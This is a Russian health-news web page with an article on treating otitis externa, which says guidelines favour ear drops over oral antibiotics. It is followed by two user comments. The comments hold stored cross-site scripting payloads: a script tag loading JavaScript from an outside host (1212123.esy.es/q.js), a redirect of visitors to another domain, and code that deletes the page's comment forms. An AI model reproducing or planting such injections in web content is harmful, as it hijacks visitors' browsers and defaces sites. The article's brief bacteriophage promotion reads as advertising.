Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Воспаленное ухо? Что лучш...  >>  Воспаленное ухо? Что лучше: таблетки или растворы?
 
Обратная связь
 

Воспаленное ухо? Что лучше: таблетки или растворы?

Размер шрифта
20 марта 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

С наружным отитом сталкивался каждый из нас. Поплавали в холодной речке или прошлись без шапки под пронизывающим ветром – и вот вы уже счастливый обладатель невыносимой боли в ухе, которая не отпускает ни днем, ни ночью.

Воспаленное ухо? Что лучше: таблетки или растворы?

Ранее врачи при этом заболевании назначали антибактериальные препараты в таблетках, однако в современным клинических руководствах отдается предпочтение ушным каплям.

Более того: даже эта форма антибиотиков не должна назначаться всем пациентам без разбора – убеждены специалисты из Американской Академии Отоларингологии.

«Треть пациентов с наружным отитом совершенно неоправданно получают системные антибиотики, которые в данном случае неэффективны и лишь множат резистентность среди бактерий», – говорит доктор Ричард Розенфельд, один из ведущих экспертов вышеупомянутой ассоциации.

«Новое руководство опирается на уже имеющийся клинический опыт и множество научных исследований, что позволяет оптимизировать диагностику и лечение наружного отита и вывести эффективность оных на принципиально новый уровень», – утверждает Розенфельд.

Наружный отит (альтернативное название – «ухо пловца») – это острое инфекционное заболевание наружного уха, чаще всего развивающееся вследствие попадания в него влаги, которая становится благоприятной средой для размножения микробов. Другими предрасполагающими факторами являются травма уха, стресс, повышенное потоотделение и аллергии. Ключевыми симптомами наружного отита являются отек, зуд, частичная потеря слуха и страшная боль, особенно при надавливании на мочку и при жевании пищи.

Заболевание лечат с помощью обезболивающих и различных ушных капель – в частности, с антибиотиками в составе. Почему не таблетками? Проблема в том, что, согласно последним представлениям, они банально неэффективны во многих случаях наружного отита. Основных причин две: во-первых, многие микробы, вызывающие отит, в принципе невосприимчивы к большинству антибиотиков, во-вторых, препараты системного действия достигают наружного слухового канала в крайне малых количествах.

Специалисты подчеркивают, тем не менее, что в ряде случаев пероральные антибиотики все же необходимы: например, когда инфекция распространяется за пределы наружного уха.

Но в целом, можно с уверенностью утверждать, что в подавляющем большинстве случаев наружный отит не требует назначения антибиотиков в таблетках. Анальгетиков и ушных капель (например, с 2% уксусной кислотой или с ципрофлоксацином) вполне достаточно для эффективного лечения.

Кроме того, для профилактики бактериальной инфекции создан новый класс препаратов – бактериофаги. Это вирусы, которые убивают только бактерии и не причиняют никакого вреда здоровым клеткам человека.

Узнайте все в нашем специальном проекте «Жизнь без антибиотиков».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Альтернатива антибиотикам?   Нужны ли бактериофаги именно вам?   Бактериофаги или антибиотики   Что такое бактериофаг  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как не оглохнуть на отдыхе
Вся правда о грибке стоп
Бронхит: лицом к лицу

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.